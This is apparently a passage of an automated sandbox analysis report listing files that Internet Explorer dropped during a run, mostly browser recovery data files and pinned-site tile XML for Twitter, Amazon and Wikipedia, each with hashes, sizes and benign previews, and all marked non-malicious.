SHA1:	8135FCD0E3AE77AFA6850FA6BCFEB8B9F47E67DE
SHA-256:	6E82F736302172A9F86A770F037FC7D68F698C170AE540FEA926C86161D524A1
SHA-512:	3C9928EA600BE9D2BAB1A01F4F25B40E6E348CA52D03D03882D5D35BD9E00E990BC0D33AA96E6C0FE7C05BDD571A178EC2F1E5FFE64D2AE4D4BAF5B52739758D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	363312
Entropy (8bit):	3.625208480105836
Encrypted:	false
SSDEEP:	3072:EZ/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGt2Z/2BfcYmu5kLTzGtUZ/2Bfc/mu5kj:9oWV3
MD5:	6470F386DE68967D6700232E56D10913
SHA1:	EE843C1611D86A86AADA329284EF933C9834DBC2
SHA-256:	0D972C63CB1821F6AB34E0F319F40CE5239B7E915AC4DC4E8AFE9C321FDA2577
SHA-512:	D261EAFFAF8133EAC993612D4A8CA41653D60B6A86BBC67C95E20391A23FDAA3342C77CF4D4766F1E3B3CB09CA2C44FD4AA1D093C3048A853FB14EFDDF951957
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{45C0347A-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5834089332198227
Encrypted:	false
SSDEEP:	48:IwIKjGcpr2zZGwpawKjG4pQiMGrapbS1hGQpKRG7HpRniTGIpX24OGApm:rPZsTQT6lBSlAAT2Fz2g
MD5:	1EED572DC8446F9CB9B47FB0A141564B
SHA1:	77AD5111A7D31CC46F83F1CE03EF270CFE423035
SHA-256:	7DBA1276C8DABCC48A8AAAC2086CF9EB587C638275FA6AFC9067C46C8A1DBDC7
SHA-512:	D7CBCF1D8B7BED80CD3BCF1FB9FDC93D547B91FA51BF540C1E991A633F300AF7549F3836308F058993630510A27FE56560E02D050CFB5330F322814C01935D87
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{71D9CEAF-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27364
Entropy (8bit):	1.8408599094745581
Encrypted:	false
SSDEEP:	96:r5ZCTQK6QBS5js2kWA5MZoGdMdCUV31WRdMdCUV31ZMaA:r5ZKQK6Qk5js2kW6MeGdur2Rdur57A
MD5:	F2F98413671EE1A54571CC6BB7677E0D
SHA1:	D1DEE1E2C606E00949B1B87AAFB0E1E0503A056B
SHA-256:	79E6399D489DEDC8B3C3C0D384D170747265AB9A2E0FEAEB42F0BBEC807A29EF
SHA-512:	F2073AE7F3AA1846F1899C25642EBAC811877A1C01948566CE4A1548F0592D1A881FCB9202158E3178207DBDA298A47BB00B88F1448FAB688CBC23841BF0C205
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{71D9CEB1-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8458522982322165
Encrypted:	false
SSDEEP:	96:rvZdTQh6XBSYjhn2dW+Mm+lpHAcnxlpHAc5A:rvZlQh6XkYjJ2dW+Mm+bHA8xbHASA
MD5:	984417C70705CE5B6C407D42ACB52AE9
SHA1:	58EB2A02D5B790CFA72C194CB524B648054CA390
SHA-256:	B41142FD8932D51F1EBEEA4317D0FB82ECE61FC44AD17F182B2550123B0D233F
SHA-512:	E79B924051AAFEBED34220B4A4DD65E7E284BFB94A7BAF90CC30074CB06DC958221FB0327AEE7E17CF6683EB02DB91973BD3A28617D4336F5B05E7FE42FEC3BA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7ECFB244-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8473010976701167
Encrypted:	false
SSDEEP:	96:rEZfTQr6VBS80j3x2lfW4MI+DavQYxDavQ9avmA:rEZbQr6Vk80jB2VW4MI+mRxmRmA
MD5:	C87CEC6C283E7904D9E81AE14EC5A60B
SHA1:	54E70138560A440AA4EBC00AFD5B887018B8A0D3
SHA-256:	B2BE5952CB57E5B5F2F75DC514E812EBF2FF23F4F953625649D64C696133C631
SHA-512:	9AB5B325C60CD5A0B3EB1AD360D72F4E7C61E80DE99630C533782528AD0231BE4B8CFFD1378E25A1D831366DAE46569926A98814F173FB4DE1CBCDBBDB45C3C4
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7ECFB246-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27356
Entropy (8bit):	1.8429834519777635
Encrypted:	false
SSDEEP:	96:rHrZFOTQH6ZBS80j0OL20zW0FM0ZuSbD0GjRSbD0GPDvA:rLZwQH6ZkRjl2SWIMcuIPjRIPPTA
MD5:	C0EB83A895920EBEEA67ADB32157F762
SHA1:	406703B9C9C74E14A41A4F4E48AD0C8E027FB6D2
SHA-256:	80991D92E5884105578759DD2EF3F3F2E966A158DBE1C5264260689E5F6C4AA7
SHA-512:	B6CEAC0FEA2FA48D618B013E6CA12C5A5A4436D56E2BFEFE74509188E09468411577C00ACAD8EB37E330B7B1700B8A38F349BDDE2420B183B6A88E7287597B9D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{84CEE2BD-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.84751962017465
Encrypted:	false
SSDEEP:	192:rmZtQx6bk2jB24WMM86pPctexpPctjPPA:riyMgwwvJbpEtKpEtjQ
MD5:	3014987993BCE20A3E6314464DCDC90D
SHA1:	5E64FF778A0366A0B18BBC0C14BE444A9B44B9A1
SHA-256:	DD8E13A8CCA5EF99626F3EBFF75AD9E6A2820254615B9AE885BA6E9C423447C3
SHA-512:	C321248CE2DB0381B0DBB22548325079AFF027F341F3E949A9D837642AF7B26FEDA8E0E239785533C0F6764DB0641A0A9855DE77787DFEFC84D31DE730D4B55B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{84CEE2BF-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27396
Entropy (8bit):	1.8548283257640903
Encrypted:	false
SSDEEP:	96:rFZeTQv6dBStjR25WpMVm3WtHv1R3WtHvSbA:rFZWQv6dktjR25WpMVmGtP1RGtPQA
MD5:	D4F08478E9DE871F2DC643D6B457A30A
SHA1:	B7EBE6B45DECB165C16FE20431B34F3819B145D4
SHA-256:	99F2612EBAF864967A97542C492C565532E1FBBF7BE6BA6A83A8EA2ED2D50C79
SHA-512:	47C381018CA1B096F360E95066BF745BE9E03523B8EB02229CA913CB683893D358751146E21A9DAB6A8571D4DF76E9AE95B656EF83CD4BBC8BBD4EBE0FF22BCA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8BC3AC80-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27864
Entropy (8bit):	1.8244467023911901
Encrypted:	false
SSDEEP:	192:rBZEpQ+6AkvjHF2fW6MDoSXBcKRXBcoBkr:rHTJNrcu7DHKeK5
MD5:	0232E7768B4756C8A88CE6DB1D08C342
SHA1:	63A6296075E9EA0257BF2FF73407DB86A17ED215
SHA-256:	38A5666D0381F67EFE4A36206E78E80629D329A9427474F6ADBE7E873258765A
SHA-512:	C47318B5C4BC5C92119A1C05A292A029D8D55B93594023147CEAAFAB4C05EA9C8E92E0EA27AA6FEF75BC82321DFB32B10BF05CBC2C7B770CC25621758BA42DDE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8BC3AC82-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27928
Entropy (8bit):	1.850221604362593
Encrypted:	false
SSDEEP:	192:r8ZTQL6hkhjF2kWHMnS7ta8otTR7ta8otDtlr:r8cOS98TsS7toj7top7
MD5:	D4C82C0721C619D1CE3344D4D908FF0C
SHA1:	79F4935EB84453E2936DEDF23CC3AD24C4357509
SHA-256:	A3A5AA2B18A947FDF1A5B546C3054C57E391B3E96C7EF9BD119A1039F2979A6E
SHA-512:	E9C8ABD04178316EAC2E7A9CD6743AEDB7061AF333AC012AA996F5D1D51E530929FBF3872D6440D61ACDECA6C14FB4FA9543FB143CB15A487F19D7F95554E466
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8BC3AC84-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.846884988544581
Encrypted:	false
SSDEEP:	96:rQZHTQP69BSvj12RWWuM2+QFd+eoIxQFd+eoJTA:rQZzQP69kvj120WuM2+QpVxQpMA
MD5:	489A6FAAF80C7EF089F298079EA2B3D1
SHA1:	A8BD8D34D03911B21577F2BD70BEC61A36012B78
SHA-256:	26DE45D59280463F8145AE641D04ED981B6E6F6C899ABDBEECAD304A0E8D890D
SHA-512:	F3897F7C75178C2A4AA813E00D6237F848CE73DD468C300A1C3D467657D40370142196EF5FCAE3D66EE949A37A1D60AA9806A139B66BC1D468FE19359328520C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8BC3AC86-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8449653399384658
Encrypted:	false
SSDEEP:	96:rtZKTQS60BSDj125WoMM+vlzL0JV8xvlzL0JVilzzA:rtZiQS60kDj125WoMM+vF0b8xvF0biZA
MD5:	D1C5E3CD9CF3CDA0DE55D578A9A1FF29
SHA1:	1A56E6D020122A710383AC92A608DA92B457A29A
SHA-256:	2B4054ACC4A1A5B9815526A1F0952BBB9A3F79CFDFFDF815D903D4E8496AB0B8
SHA-512:	BA3B4EA74EABADB97D1BA82B25EA2CC3F409327ECDA165ADF4158DF529CFCE6AB323437474C055A3BB46237A891F75CAA05C781B00755DE3609F851B261DA72A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8BC3AC88-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27364
Entropy (8bit):	1.840406849367518
Encrypted:	false
SSDEEP:	48:Iw1R/jGcpr7GZGwpa4jG4pQ4GrapbS0GQpBKGHHpcjTGUp8uGzYpmxAGopUHFNY3:rVZiTQM6GBSsjR29WCMiG93eR93QTA
MD5:	82ABAF63190997FAF2071DAF5CC6673B
SHA1:	72C5EEB7A498E78DC88FD6CE023F373BAD99EAA9
SHA-256:	38BF315D97133CEDB64315E76500E2CFE1EFE018D0A2A2168B2D6383BE9CD72F
SHA-512:	8B72646F0AFD32E1AAAFEF93522F39FC17C0E200B6EE8C58437C28B3FD3841FB0AF8FB0DFED3D39237879619C323B56CC8BEB7072B27CFC65BFF41E5A26EBFE6
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{92BC32FA-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27388
Entropy (8bit):	1.8474832267929133
Encrypted:	false
SSDEEP:	48:IwWjGcprhZGwpaAjG4pQ0GrapbScGQpBaGHHpcrTGUp8jGzYpmI8GopMuqzTKmeZ:r2ZhTQk6CBS0jh2FW5MFOScBRScVA
MD5:	19892F02671411863A68674FA60E9944
SHA1:	4AF01D1A1C4DEE66F5ACD46646920CDE97752F0A
SHA-256:	A342DA6E6E5216787B9171D081367A06E932D7496FEAEB689FEE2A6D06062EED
SHA-512:	BDB6F1A34DC2CB0C2A48626F8CDE871FAA31032C0FDB984B55C73759AC71E6CA2E27E427A395E2F5A0AEF31836B91FA006A1AF8D249DF65FEEB77EE814ABF614
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{92BC32FC-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.8463068312138158
Encrypted:	false
SSDEEP:	192:rtZuQq64kujx2bWKMl6vZZSIxvZZSzZ9A:rDrVFogyLovZ4wvZ4zZu
MD5:	A9D4BEEFE8FB9480554230C3E6199B45
SHA1:	36DC3905F82BF23CDBBCB2E57A92B97E7527F0B0
SHA-256:	59B201BD49524496CD362999F5045A8BD9C46F7B7685FB3387F8980A45B114F4
SHA-512:	19AF2CCD2520508DF290D83EC2E2640C669641F70B200FC9FA602886019F61AB774330964B0A2DBFC8321F117642F4DE101950F5609542BE7120B92B88630125
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{92BC32FE-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27380
Entropy (8bit):	1.8474920823218917
Encrypted:	false
SSDEEP:	192:rMZvQD6Nk1jxn2bWCMGWribyKw7xribyKwyi7A:rMom2RIyz5rdFrdKT
MD5:	E7BFDADF8880B8B3D43E591C726A1455
SHA1:	4EC663E7FB938095A098D8074CA82C69E3E4743E
SHA-256:	FAD8376334B704946C5FB3E28037FE6F8C25C3E2354B4E061D22B5CF86614DC8
SHA-512:	76C95DE928577A2AA1169603999762EBC33D532497DDDE1063D3CEBCA58D76023BAC45853B9E87B7533C1E4668819B87CCA3FEAEA19D57B095738D1F0E7253E9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F800807-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27356
Entropy (8bit):	1.8419137861628907
Encrypted:	false
SSDEEP:	96:roYZqRTQP06pBS3jF2mWKMmuKIsklRKIsk1IsfA:rDZEQ86pk3jF2mWKMmuNsURNs5sfA
MD5:	FEAC79ADA2B6511CD39CE8F5E987DD6D
SHA1:	2672E4CA8FE29F599254915F82AFEDFB16FA128B
SHA-256:	F64B2AAEF5B708B2CD0021E1864972975F27143EEF26A763FF686FEB48754B37
SHA-512:	ECD01D1A9C07EEF1840B3F81A5DAA4FA6DE766438DEDAA2AA1F8D25BA0256D6C8E96565F972464559E04D53FF2F169950C4DD5BDCCBD6E2435E47C7B0184E041
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F800809-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8398438073435117
Encrypted:	false
SSDEEP:	96:rqZZTQl6G4BS3jx2GWqMq+1WrSpSFx1WrSpSaWoA:rqZxQl6xk3jx2GWqMq+16Spqx16SpJtA
MD5:	6BFF8042BD8FD2FEE08E19B49C190E21
SHA1:	BAB70C2D5FCF02F28CDEF3598D342A2E834184D6
SHA-256:	CBB3114E845B828BDACD80F9AD63E2451B67E044E390D78B89D3ECF2B2F17132
SHA-512:	F658373BAB94BD2111E5112FF2071C6C060D6BC4E35543C808033F2298D929A98C7733E134F31147BA5B591B7ABB8F5BCD8C22B9663793CEFC2D5D068F5775AF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F80080B-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27924
Entropy (8bit):	1.8476052898188118
Encrypted:	false
SSDEEP:	96:r4ZTTQH6VBSAjN2rWBMh263f3kx63f3F+cr:r4ZPQH6VkAjN2rWBMh2A0xA9r
MD5:	8200AD22CC7103ED6E8574C15B9F9A75
SHA1:	0FF1313A6175F2CCCFDAD0A4169ED8D351188A66
SHA-256:	28956114E52792831F5E9FA97DFAA7E2190A0239908ABCE5BE7ACBFAB2C02331
SHA-512:	D17D326CB3839F052CB72117242CBDD7F15278762D0EAC3C1D82FBDBA480156B78B3FDD9EFBB5B7ED748E63333BF8BB63F751214076C955D56B463FC8188C2C8
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F80080D-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.844036131703423
Encrypted:	false
SSDEEP:	48:IwBjGcprIZGwpafjG4pQLGrapbSe9GQpBGzBGHHpcGHlGTGUp8GhGzYpmGEyGopK:rbZITQ96/BSKjB28WWWMm+zZxzwA
MD5:	33D60916DD582F9983A6F358C919CC39
SHA1:	6916BDB12DA36C5D53530453AC89DC4B5D293D61
SHA-256:	EF9B4C14E7528DB34C326E1E5920D53F8C7ACDAD89CE6D358CA6617866335599
SHA-512:	A1D4112A7897BE8BDDF2B7A381AE723C76068DE0FA17966AC14F59FD5F94F2E7EECB4258D560D1B0ECEA251046BBF429DECF54022815ED3D61BB6082F8AE4183
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F80080F-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27088
Entropy (8bit):	1.8408757511602245
Encrypted:	false
SSDEEP:	96:rzZtTQ16zBS1j52NWTMTTmYmcQexYm1mcQQA:rzZVQ16zk1j52NWTMTTmYmcxxYm1mcrA
MD5:	2BF31819BC3E9E32157022FC399BA7F7
SHA1:	D569F1E0E42462F21F6B1D0D688DF93E9B3B5E29
SHA-256:	D5241EB3AD79B36D2F1ABFB93F8422C317233CDBC0C6A390D3A1080E5AE7F4B2
SHA-512:	C311254715B385AF1C7314B3C62C5D3259FCDDC86F311D64F3750A8D2848B3233C11AA65232B35A2EFB882E1EF450A6829E3C9A995B973D30DEBCBCF4BB87D0C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9F800811-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	27364
Entropy (8bit):	1.8409918825778344
Encrypted:	false
SSDEEP:	48:IwjjGcpruZGwpaqjG4pQSGrapbSLGQpBjWGHHpcXTGUp8BGzYpmgiGopUCjVCjjq:rNZuTQe6UBSljp2hWvMjGMGiRMGL2A
MD5:	2A94E79E629ADD524DDBEFAD598BCB63
SHA1:	67CDE574B9E02D2F9353380A36198EF70CF52161
SHA-256:	5341E8C42883750CB82BF8666C2CA81821BC0092C6AB566E2E254482CD3DCF76
SHA-512:	D8B973C50FDA6307CF59295E2C0F67F4310FB8DE5C7F765B0DC111FBC04EBE43E89253EECDF8DA868CCA95300FF1538C3CAB68BFC28918B84C487F7DFA8CAFBD
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.065791764544783
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEyo30o31nWimI002EtM3MHdNMNxOEyo30o31nWimI00OYGVbkEtMb:2d6NxOw3b31SZHKd6NxOw3b31SZ7YLb
MD5:	C5868A1096D1F14940595D1B54EF5147
SHA1:	C4C62FE1D8087A0AD64C88892D1E409C1E2B7DD4
SHA-256:	290120E4402DB8CC0F9D7878A1563E91FF179C33BCB3CD37EA7471BDC7BC5D7D
SHA-512:	A600FA4DF9D6FCF67637A0030049B29D51F783A6AE2C5D017C72640AB1461374CB1CEE02A75830632D313E2299A7D984AE277E47104AB717D04D7EA61C072EF5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x15729d0d,0x01d73c7e</date><accdate>0x15729d0d,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x15729d0d,0x01d73c7e</date><accdate>0x15729d0d,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.119847698885451
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kgD3i6D3i1nWimI002EtM3MHdNMNxe2kgD3i6D3i1nWimI00OYGkan:2d6Nxrjy8y1SZHKd6Nxrjy8y1SZ7Yzan
MD5:	94397BDF94646BC6B2AAE7E724E9523A
SHA1:	51A8A6BF4CB98FBA9AD56961E6FB49073909FBCA
SHA-256:	52CFB9B13F4DA5E884F294DB90EDAA45A3E078D43BF87FE201B9B776BCE28F97
SHA-512:	801932B94F825DA6F8865AA8CE82774C47A29BB8A056FD8ADC0C67ACA8D007399A2CEBC0A89F952DD979F69A0C1A9D3B265914D69109A649F119516F17251D0A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x156b75f2,0x01d73c7e</date><accdate>0x156b75f2,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x156b75f2,0x01d73c7e</date><accdate>0x156b75f2,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.102483135655529
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLJ3L31nWimI002EtM3MHdNMNxvLJ3L31nWimI00OYGmZEtMb:2d6NxvV71SZHKd6NxvV71SZ7Yjb
MD5:	5C61302F80A774F495DE7A8808F13525
SHA1:	C32850CEE423656848595940EB5392D23E930E5F
SHA-256:	8DE5F301C74443DFA18EDEA9EFDCBE6B3122F5AE90549F4AB3605CF0FE27E4F6
SHA-512:	CEEF49B2FF7A8575A3CD41630D7F319D75E25DEEFC19305F39FD413B5E8FAB6789EF9CEE4F7356849872114E70FE1E14DBE01EA6DB7F0D0D069F754770DD1D90
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1574ff56,0x01d73c7e</date><accdate>0x1574ff56,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1574ff56,0x01d73c7e</date><accdate>0x1574ff56,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.0808623820521825
Encrypted:	false
SSDEEP:	12:TMHdNMNxiyo30o31nWimI002EtM3MHdNMNxiyo30o31nWimI00OYGd5EtMb:2d6NxO3b31SZHKd6NxO3b31SZ7YEjb
